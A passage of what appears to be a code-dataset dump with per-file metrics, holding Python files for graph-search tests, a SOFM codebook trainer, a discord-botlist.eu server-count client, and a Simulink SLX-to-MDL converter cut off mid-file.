| 24.285714 | 46 | 0.794118 | 22 | 170 | 5.636364 | 0.454545 | 0.241935 | 0.258065 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105882 | 170 | 6 | 47 | 28.333333 | 0.815789 | 0.235294 | 0 | 0 | 0 | 0 | 0.225806 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0651ae5aada87e2a96994515698f86e5e6738419 | 1,899 | py | Python | tests/search/test_basic.py | jaebradley/python_problems | 24b8ecd49e3095f5c607906cb36019b9e865a20f | [
"MIT"
] | null | null | null | tests/search/test_basic.py | jaebradley/python_problems | 24b8ecd49e3095f5c607906cb36019b9e865a20f | [
"MIT"
] | 5 | 2017-08-25T20:43:16.000Z | 2019-10-18T16:49:43.000Z | tests/search/test_basic.py | jaebradley/python_problems | 24b8ecd49e3095f5c607906cb36019b9e865a20f | [
"MIT"
] | null | null | null | """
Unit Test for search.basic problems
"""
from unittest import TestCase
from search.basic import recursive_dfs, iterative_dfs
class TestRecursiveDepthFirstSearch(TestCase):
"""
Unit Test for recursive Depth First Search implementation
"""
def test_searching_returns_nodes(self):
"""Test returns expected nodes"""
graph = {'A': {'B', 'C'},
'B': {'A', 'D', 'E'},
'C': {'A', 'F'},
'D': {'B'},
'E': {'B', 'F'},
'F': {'C', 'E'}}
self.assertEqual(recursive_dfs(graph=graph, start='A'), {'A', 'B', 'C', 'D', 'E', 'F'})
def test_searching_cycle_returns_cycle_nodes(self):
"""Test returns nodes in cycle"""
graph = {'A': {'B', 'C'},
'B': {'D'},
'C': {'A', 'F'},
'D': {'B'},
'E': {'B', 'F'},
'F': {'C', 'E'}}
self.assertEqual(recursive_dfs(graph=graph, start='B'), {'B', 'D'})
class TestIterativeDepthFirstSearch(TestCase):
"""
Unit Test for iterative Depth First Search implementation
"""
def test_searching_returns_nodes(self):
"""Test returns expected nodes"""
graph = {'A': {'B', 'C'},
'B': {'A', 'D', 'E'},
'C': {'A', 'F'},
'D': {'B'},
'E': {'B', 'F'},
'F': {'C', 'E'}}
self.assertEqual(iterative_dfs(graph=graph, start='A'), {'A', 'B', 'C', 'D', 'E', 'F'})
def test_searching_cycle_returns_cycle_nodes(self):
"""Test returns nodes in cycle"""
graph = {'A': {'B', 'C'},
'B': {'D'},
'C': {'A', 'F'},
'D': {'B'},
'E': {'B', 'F'},
'F': {'C', 'E'}}
self.assertEqual(iterative_dfs(graph=graph, start='B'), {'B', 'D'})
| 30.142857 | 95 | 0.434439 | 206 | 1,899 | 3.898058 | 0.174757 | 0.014944 | 0.022416 | 0.099626 | 0.719801 | 0.719801 | 0.719801 | 0.712329 | 0.712329 | 0.712329 | 0 | 0 | 0.344918 | 1,899 | 62 | 96 | 30.629032 | 0.645498 | 0.138494 | 0 | 0.777778 | 0 | 0 | 0.055802 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 1 | 0.111111 | false | 0 | 0.055556 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
88cdbda6ec61e92bf42cbbfc5ad3e0d8ffd43392 | 11,263 | py | Python | siftmodel/codebook.py | Shaalan31/LIWI | b4d615e0951b7c28c9258d0d7a8ff86c73c4ebe2 | [
"MIT"
] | 2 | 2019-10-16T07:37:46.000Z | 2020-10-04T10:31:02.000Z | siftmodel/codebook.py | Shaalan31/LIWI | b4d615e0951b7c28c9258d0d7a8ff86c73c4ebe2 | [
"MIT"
] | 3 | 2021-03-19T00:22:56.000Z | 2022-01-13T01:12:35.000Z | siftmodel/codebook.py | Shaalan31/LIWI | b4d615e0951b7c28c9258d0d7a8ff86c73c4ebe2 | [
"MIT"
] | 2 | 2019-06-04T10:58:39.000Z | 2019-06-06T18:52:01.000Z | import numpy as np
from neupy import algorithms, utils, storage
import h5py
import glob
import cv2 as cv
from siftmodel.sift import *
from utils import *
import pickle
def on_epoch_end(self, optimizer):
print("Last epoch: {}".format(optimizer.last_epoch))
storage.load(optimizer, filepath='file.hdf5')
class Som_iam:
def __init__(self,config_file_path):
config_file = open(config_file_path, "r")
#Array of configurations
config = config_file.read().split(',')
self.descriptors = None
self.sofm = None
self.data = None
# load descriptors if already done before
def load_descriptors(self,filename):
with open(filename, 'rb') as input:
self.descriptors = pickle.load(input)
def init_sofm(self,lr=0.5):
self.sofm = algorithms.SOFM(n_inputs=128,n_outputs=300,step=lr,learning_radius=0,weight='init_pca',shuffle_data=True,verbose =True)
with open('sofm_iam.pkl', 'wb') as output:
pickle.dump(self.sofm, output, pickle.HIGHEST_PROTOCOL)
def read_sofm(self):
with open('sofm_iam.pkl', 'rb') as input:
self.sofm = pickle.load(input)
def train_sofm(self,data,ep=1):
self.sofm.train(data,epochs=ep)
with open('sofm_iam.pkl', 'wb') as output:
pickle.dump(self.sofm, output, pickle.HIGHEST_PROTOCOL)
def generate_codebook(self,sofm):
centers=(sofm.weight).transpose()
with open('centers_iam.pkl', 'wb') as output:
pickle.dump(centers, output, pickle.HIGHEST_PROTOCOL)
print(centers)
print("centers shape are : ",centers.shape)
def read_codebook(self):
with open('centers_iam.pkl', 'rb') as input:
centers = pickle.load(input)
return centers
# def codebook_generation(self,num_batches, sofm, epoch):
#
# if (sofm is None):
# sofm = algorithms.SOFM(n_inputs=128,
# n_outputs=300,
# step=0.5,
# learning_radius=0,
# signals=on_epoch_end
# )
#
# with h5py.File('Datasets/SDpoints0.h5', 'r') as hf:
# data = hf['keypoints-batch'][:]
# for x in range(1, int(num_batches) + 1):
# with h5py.File('Datasets/SDpoints0.h5', 'r') as hf:
# data = np.append(data, hf['keypoints-batch'][:], axis=0)
# sofm.train(data, epochs=int(epoch))
# def data_preprocessor(self):
# sift = Sift()
# with open("Output.txt", 'w') as out:
# out.write("")
# batch_num = 0
# SDpoints = np.zeros((1, 128))
# for filename in glob.glob('WordsDatabase/*/*/*.png'):
# temp = sift.get_des(cv.imread(filename))
# if temp is not None:
# SDpoints = np.append(SDpoints, temp, axis=0)
# if SDpoints.shape[0] > 40000:
# SDpoints = np.delete(SDpoints, (0), axis=0)
# # SDpoints, _,_ = feature_normalize(SDpoints)
# with h5py.File('Datasets/SDpoints' + str(batch_num) + '.h5', 'w') as hf:
# hf.create_dataset("keypoints-batch", data=SDpoints)
#
# with open("Output.txt", 'a') as out:
# out.write(str(batch_num) + " " + filename + " " + str(SDpoints.shape[0]) + "\n")
# # print(str(batch_num) + " " +filename + " " + str(SDpoints.shape[0]) + "\n")
# batch_num += 1
# SDpoints = np.zeros((1, 128))
# with h5py.File('Datasets/SDpoints' + str(batch_num) + '.h5', 'w') as hf:
# hf.create_dataset("keypoints-batch", data=SDpoints)
#
# with open("Output.txt", 'a') as out:
# out.write(str(batch_num) + " " + filename + " " + str(SDpoints.shape[0]) + "\n")
# print(str(batch_num) + " " + filename + " " + str(SDpoints.shape[0]) + "\n")
# batch_num += 1
def normalize(self):
with open("stats.txt", 'w') as out:
out.write("")
SDpoints = np.zeros((1, 128))
SDpointsFinal = np.zeros((1, 128))
for x in range(0, 244):
print(x)
with h5py.File('Datasets/SDpoints' + str(x) + '.h5', 'r') as hf:
SDpoints = np.append(SDpoints, hf['keypoints-batch'][:], axis=0)
if (x % 50 == 0):
SDpoints = np.delete(SDpoints, (0), axis=0)
SDpointsFinal = np.append(SDpointsFinal, SDpoints, axis=0)
print(SDpointsFinal.shape)
SDpoints = np.zeros((1, 128))
SDpoints = np.delete(SDpoints, (0), axis=0)
SDpointsFinal = np.append(SDpointsFinal, SDpoints, axis=0)
SDpoints = np.zeros((1, 128))
# print(SDpointsFinal.shape)
SDpointsFinal = np.delete(SDpointsFinal, (0), axis=0)
# SDpointsFinal, mean,dev = feature_normalize(SDpointsFinal)
mean = np.mean(SDpointsFinal, axis=0)
print(SDpointsFinal)
mean = mean.reshape((1, 128))
print(SDpointsFinal.transpose().shape, SDpointsFinal.shape)
normalized_X = SDpointsFinal - mean
print(normalized_X.shape)
deviation = np.sqrt(np.var(normalized_X, axis=0))
normalized_X = np.divide(normalized_X, deviation)
with open("stats.txt", 'a') as out:
out.write("Mean: " + str(mean) + " \nDev: " + str(deviation))
with h5py.File('Datasets/AData.h5', 'w') as hf:
hf.create_dataset("keypoints-batch", data=normalized_X)
class Som_KHATT:
def __init__(self,new = True):
self.descriptors = None
self.load_descriptors()
print(self.descriptors.shape)
self.sofm = None
self.centers = None
if not new:
self.init_sofm()
else:
self.read_sofm()
print(self.sofm)
# load descriptors if already done before
def load_descriptors(self,filename = 'C:/Users/omars/Documents/Github/LIWI/Datasets/KHATT/AData.h5' ):
with h5py.File(filename, 'r') as hf:
self.descriptors = hf['keypoints-batch'][:]
def init_sofm(self,lr=0.5):
self.sofm = algorithms.SOFM(n_inputs=128,n_outputs=300,step=lr,learning_radius=0,weight='sample_from_data',shuffle_data=True,verbose =True)
with open('sofm_KHATT1.pkl', 'wb') as output:
pickle.dump(self.sofm, output, pickle.HIGHEST_PROTOCOL)
def read_sofm(self):
with open('sofm_KHATT.pkl', 'rb') as input:
self.sofm = pickle.load(input)
def train_sofm(self,ep=1):
self.sofm.train(self.descriptors,epochs=ep)
with open('sofm_KHATT.pkl', 'wb') as output:
pickle.dump(self.sofm, output, pickle.HIGHEST_PROTOCOL)
def generate_codebook(self):
self.centers=(self.sofm.weight).transpose()
with open('centers_KHATT.pkl', 'wb') as output:
pickle.dump(self.centers, output, pickle.HIGHEST_PROTOCOL)
print(self.centers)
print("centers shape are : ",self.centers.shape)
def read_codebook(self):
with open('centers_KHATT.pkl', 'rb') as input:
self.centers = pickle.load(input)
def train_loop(self,ep=1):
self.train_sofm(ep)
self.generate_codebook()
# def codebook_generation(self,num_batches, sofm, epoch):
#
# if (sofm is None):
# sofm = algorithms.SOFM(n_inputs=128,
# n_outputs=300,
# step=0.5,
# learning_radius=0,
# signals=on_epoch_end
# )
#
# with h5py.File('Datasets/SDpoints0.h5', 'r') as hf:
# data = hf['keypoints-batch'][:]
# for x in range(1, int(num_batches) + 1):
# with h5py.File('Datasets/SDpoints0.h5', 'r') as hf:
# data = np.append(data, hf['keypoints-batch'][:], axis=0)
# sofm.train(data, epochs=int(epoch))
# def data_preprocessor(self):
# sift = Sift()
# with open("Output.txt", 'w') as out:
# out.write("")
# batch_num = 0
# SDpoints = np.zeros((1, 128))
# for filename in glob.glob('WordsDatabase/*/*/*.png'):
# temp = sift.get_des(cv.imread(filename))
# if temp is not None:
# SDpoints = np.append(SDpoints, temp, axis=0)
# if SDpoints.shape[0] > 40000:
# SDpoints = np.delete(SDpoints, (0), axis=0)
# # SDpoints, _,_ = feature_normalize(SDpoints)
# with h5py.File('Datasets/SDpoints' + str(batch_num) + '.h5', 'w') as hf:
# hf.create_dataset("keypoints-batch", data=SDpoints)
#
# with open("Output.txt", 'a') as out:
# out.write(str(batch_num) + " " + filename + " " + str(SDpoints.shape[0]) + "\n")
# # print(str(batch_num) + " " +filename + " " + str(SDpoints.shape[0]) + "\n")
# batch_num += 1
# SDpoints = np.zeros((1, 128))
# with h5py.File('Datasets/SDpoints' + str(batch_num) + '.h5', 'w') as hf:
# hf.create_dataset("keypoints-batch", data=SDpoints)
#
# with open("Output.txt", 'a') as out:
# out.write(str(batch_num) + " " + filename + " " + str(SDpoints.shape[0]) + "\n")
# print(str(batch_num) + " " + filename + " " + str(SDpoints.shape[0]) + "\n")
# batch_num += 1
def normalize(self):
with open("stats.txt", 'w') as out:
out.write("")
SDpoints = np.zeros((1, 128))
SDpointsFinal = np.zeros((1, 128))
for x in range(0, 244):
print(x)
with h5py.File('Datasets/SDpoints' + str(x) + '.h5', 'r') as hf:
SDpoints = np.append(SDpoints, hf['keypoints-batch'][:], axis=0)
if (x % 50 == 0):
SDpoints = np.delete(SDpoints, (0), axis=0)
SDpointsFinal = np.append(SDpointsFinal, SDpoints, axis=0)
print(SDpointsFinal.shape)
SDpoints = np.zeros((1, 128))
SDpoints = np.delete(SDpoints, (0), axis=0)
SDpointsFinal = np.append(SDpointsFinal, SDpoints, axis=0)
SDpoints = np.zeros((1, 128))
# print(SDpointsFinal.shape)
SDpointsFinal = np.delete(SDpointsFinal, (0), axis=0)
# SDpointsFinal, mean,dev = feature_normalize(SDpointsFinal)
mean = np.mean(SDpointsFinal, axis=0)
print(SDpointsFinal)
mean = mean.reshape((1, 128))
print(SDpointsFinal.transpose().shape, SDpointsFinal.shape)
normalized_X = SDpointsFinal - mean
print(normalized_X.shape)
deviation = np.sqrt(np.var(normalized_X, axis=0))
normalized_X = np.divide(normalized_X, deviation)
with open("stats.txt", 'a') as out:
out.write("Mean: " + str(mean) + " \nDev: " + str(deviation))
with h5py.File('Datasets/AData.h5', 'w') as hf:
hf.create_dataset("keypoints-batch", data=normalized_X)
| 40.225 | 147 | 0.550653 | 1,338 | 11,263 | 4.539611 | 0.11435 | 0.01811 | 0.025683 | 0.039513 | 0.853145 | 0.827626 | 0.799309 | 0.795028 | 0.7784 | 0.763253 | 0 | 0.025929 | 0.304892 | 11,263 | 279 | 148 | 40.369176 | 0.749904 | 0.380627 | 0 | 0.557143 | 0 | 0 | 0.078232 | 0.008725 | 0 | 0 | 0 | 0 | 0 | 1 | 0.128571 | false | 0 | 0.057143 | 0 | 0.207143 | 0.121429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
aebb9b1e6a2e657a9987930f6bdc8deb7dfa86a6 | 4,646 | py | Python | dbleupy/__init__.py | itsflorent/python-library | efc4163b3a3edde55d47f2d503e8b715550933ff | [
"MIT"
] | 1 | 2021-10-16T21:50:02.000Z | 2021-10-16T21:50:02.000Z | dbleupy/__init__.py | itsflorent/python-library | efc4163b3a3edde55d47f2d503e8b715550933ff | [
"MIT"
] | null | null | null | dbleupy/__init__.py | itsflorent/python-library | efc4163b3a3edde55d47f2d503e8b715550933ff | [
"MIT"
] | 2 | 2021-10-17T08:36:03.000Z | 2021-10-20T21:28:44.000Z | import requests
import json
from requests import api
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def dbleu_postservercount(apikey=None, servercount=None, log_disable=None):
if apikey == None and servercount == None:
if log_disable == None or log_disable == False:
print(bcolors.FAIL + "[API] discord-botlist.eu HTTP: APIKEY & ServerCount missing find more on https://pypi.org/project/dbleupy/ - ./dbleu_postservercount" + bcolors.ENDC)
return
if apikey == None:
if log_disable == None or log_disable == False:
print(bcolors.FAIL + "[API] discord-botlist.eu HTTP: APIKEY missing find more on https://pypi.org/project/dbleupy/" + bcolors.ENDC)
return
if servercount == None:
if log_disable == None or log_disable == False:
print(bcolors.FAIL + "[API] discord-botlist.eu HTTP: ServerCount missing find more on https://pypi.org/project/dbleupy/" + bcolors.ENDC)
return
try:
guilds = len(servercount.guilds)
r = requests.patch('https://api.discord-botlist.eu/v1/update', headers={
"Authorization": f"Bearer {apikey}"
}, json=({"serverCount": guilds}))
if r.status_code == 400:
if log_disable == None or log_disable == False:
print(bcolors.FAIL + "[API] discord-botlist.eu HTTP: 400 - Please check your API key. Access denied." + bcolors.ENDC)
return
if r.status_code == 200:
if log_disable == None or log_disable == False:
print(bcolors.OKGREEN + f"[API] discord-botlist.eu HTTP: 200 - Posted server count ({guilds})" + bcolors.ENDC)
return
else:
content = r.content
content = content.decode("utf-8")
content = json.loads(content)
if log_disable == None or log_disable == False:
print(bcolors.FAIL + f"[API] discord-botlist.eu HTTP: {r.status_code} - {content['message']}" + bcolors.ENDC)
return
except:
if log_disable == None or log_disable == False:
print(bcolors.FAIL + f"[API] discord-botlist.eu HTTP: Please check your bot's data (bot or self.bot)" + bcolors.ENDC)
return
def dbleu_getbotvotes(apikey=None, log_disable=None):
if apikey == None:
if log_disable == None or log_disable == False:
print(bcolors.FAIL + "[API] discord-botlist.eu HTTP: APIKEY missing find more on https://pypi.org/project/dbleupy/" + bcolors.ENDC)
return
r = requests.get('https://api.discord-botlist.eu/v1/votes', headers={"Authorization": f"Bearer {apikey}"})
if r.status_code == 400:
if log_disable == None or log_disable == False:
print(bcolors.FAIL + "[API] discord-botlist.eu HTTP: 400 - Please check your API key. Access denied." + bcolors.ENDC)
return
if r.status_code == 200:
print(bcolors.OKGREEN + f"[API] discord-botlist.eu HTTP: {r.status_code}" + bcolors.ENDC)
return r
else:
content = r.content
content = content.decode("utf-8")
content = json.loads(content)
if log_disable == None or log_disable == False:
print(bcolors.FAIL + f"[API] discord-botlist.eu HTTP: {r.status_code} - {content['message']}" + bcolors.ENDC)
return
def dbleu_getbotdata(apikey=None, log_disable=None):
if apikey == None:
if log_disable == None or log_disable == False:
print(bcolors.FAIL + "[API] discord-botlist.eu HTTP: APIKEY missing find more on https://pypi.org/project/dbleupy/" + bcolors.ENDC)
return
r = requests.get('https://api.discord-botlist.eu/v1/ping', headers={"Authorization": f"Bearer {apikey}"})
if r.status_code == 400:
if log_disable == None or log_disable == False:
print(bcolors.FAIL + "[API] discord-botlist.eu HTTP: 400 - Please check your API key. Access denied." + bcolors.ENDC)
return
if r.status_code == 200:
print(bcolors.OKGREEN + f"[API] discord-botlist.eu HTTP: {r.status_code}" + bcolors.ENDC)
return r
else:
content = r.content
content = content.decode("utf-8")
content = json.loads(content)
if log_disable == None or log_disable == False:
print(bcolors.FAIL + f"[API] discord-botlist.eu HTTP: {r.status_code} - {content['message']}" + bcolors.ENDC)
return
| 34.161765 | 183 | 0.613216 | 595 | 4,646 | 4.714286 | 0.157983 | 0.103387 | 0.109091 | 0.121925 | 0.846346 | 0.822816 | 0.813547 | 0.802852 | 0.802852 | 0.7918 | 0 | 0.022668 | 0.259363 | 4,646 | 135 | 184 | 34.414815 | 0.792502 | 0 | 0 | 0.666667 | 0 | 0.133333 | 0.318192 | 0.004952 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.033333 | 0 | 0.344444 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
aebf6cc750f2a16a603ca446ee7e97ac8225f959 | 141 | py | Python | akData/format/__init__.py | adamkerz/akData | 673884671da54b2b96480616a3f2633ba4b4710d | [
"BSD-3-Clause"
] | null | null | null | akData/format/__init__.py | adamkerz/akData | 673884671da54b2b96480616a3f2633ba4b4710d | [
"BSD-3-Clause"
] | null | null | null | akData/format/__init__.py | adamkerz/akData | 673884671da54b2b96480616a3f2633ba4b4710d | [
"BSD-3-Clause"
] | null | null | null | from . import boolean
from . import number
from . import datetime
from . import phoneNumber
from . import abn
from . import django
| 15.666667 | 26 | 0.716312 | 18 | 141 | 5.611111 | 0.444444 | 0.594059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.241135 | 141 | 8 | 27 | 17.625 | 0.943925 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
aec6c5922fa1441258ef417b7eb521d5d29aa418 | 112,817 | py | Python | tags_model.py | mdstepha/SLX2MDL | e96605ab88c8e17a52b7345d3920437207fdb86a | [
"MIT"
] | 2 | 2021-02-13T13:14:20.000Z | 2022-03-22T17:06:33.000Z | tags_model.py | mdstepha/SLX2MDL | e96605ab88c8e17a52b7345d3920437207fdb86a | [
"MIT"
] | null | null | null | tags_model.py | mdstepha/SLX2MDL | e96605ab88c8e17a52b7345d3920437207fdb86a | [
"MIT"
] | null | null | null | #!/usr/bin/python3
from commons import Utils, XmlElement
class Annotation(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Annotation') and strval.endswith('</Annotation>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Annotation' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Annotation(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'Annotation {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class AnnotationDefaults(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<AnnotationDefaults') and strval.endswith('</AnnotationDefaults>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'AnnotationDefaults' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return AnnotationDefaults(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'AnnotationDefaults {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class Array(XmlElement):
# OBSERVATION:
# 1. <Array> contains only one type of children tag
# 2. <Array> does not contain <P> tag (follows from observation 1)
# 3. 'Dimension' of an array (in mdl) is its number of children
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Array') and strval.endswith('</Array>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.dimension = len(self.inner_xmls_of_type_xml)
self.ps = []
self.objects = []
self.cells = []
self.mATStructs = []
self.arrays = [] # found in matlab-central/RC_Demo_C2000_Control_Unit
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Object':
self.objects.append(Object.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Cell':
self.cells.append(Cell.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'MATStruct':
self.mATStructs.append(MATStruct.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Array':
self.arrays.append(Array.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Array' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Array(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'Array {\n'
for x in self.attrs:
if x.name in ['Dimension']:
continue
str_ += f'{x.name} "{x.value}"\n'
str_ += f'Dimension {self.dimension}\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.objects:
str_ += f'{x.strmdl}\n'
for x in self.cells:
str_ += f'{x.strmdl}\n'
for x in self.mATStructs:
str_ += f'{x.strmdl}\n'
for x in self.arrays:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class Block(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Block') and strval.endswith('</Block>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.ports = []
self.masks = []
self.systems = []
self.instanceDatas = []
self.lists = []
self.functionPorts = []
self.objects = []
self.linkDatas = [] # found in corpus/matlab-central/Dual_Clutch_Trans.slx
self.instanceDatas = [] # found in corpus/matlab-central/HEV_Battery_Lib.slx
self.arrays = [] # found in corpus/github/daq2_sim.slx
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Port':
self.ports.append(Port.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Mask':
self.masks.append(Mask.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'System':
self.systems.append(System.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'InstanceData':
self.instanceDatas.append(InstanceData.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'List':
self.lists.append(List.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'FunctionPort':
self.functionPorts.append(FunctionPort.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Object':
self.objects.append(Object.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'LinkData':
self.linkDatas.append(LinkData.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'InstanceData':
self.instanceDatas.append(InstanceData.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Array':
self.arrays.append(Array.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Block' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Block(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'Block {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.ports:
str_ += f'{x.strmdl}\n'
for x in self.masks:
str_ += f'{x.strmdl}\n'
for x in self.systems:
str_ += f'{x.strmdl}\n'
for x in self.instanceDatas:
str_ += f'{x.strmdl}\n'
for x in self.lists:
str_ += f'{x.strmdl}\n'
for x in self.functionPorts:
str_ += f'{x.strmdl}\n'
for x in self.objects:
str_ += f'{x.strmdl}\n'
for x in self.linkDatas:
str_ += f'{x.strmdl}\n'
for x in self.instanceDatas:
str_ += f'{x.strmdl}\n'
for x in self.arrays:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class BlockDefaults(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<BlockDefaults') and strval.endswith('</BlockDefaults>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'BlockDefaults' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return BlockDefaults(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'BlockDefaults {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class BlockDiagramDefaults(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<BlockDiagramDefaults') and strval.endswith('</BlockDiagramDefaults>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.systemDefaults = []
self.blockDefaults = []
self.annotationDefaults = []
self.lineDefaults = []
self.maskDefaults = []
self.blockParameterDefaults = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'SystemDefaults':
self.systemDefaults.append(SystemDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'BlockDefaults':
self.blockDefaults.append(BlockDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'AnnotationDefaults':
self.annotationDefaults.append(AnnotationDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'LineDefaults':
self.lineDefaults.append(LineDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'MaskDefaults':
self.maskDefaults.append(MaskDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'BlockParameterDefaults':
self.blockParameterDefaults.append(BlockParameterDefaults.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'BlockDiagramDefaults' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return BlockDiagramDefaults(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = ''
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.systemDefaults:
str_ += f'{x.strmdl}\n'
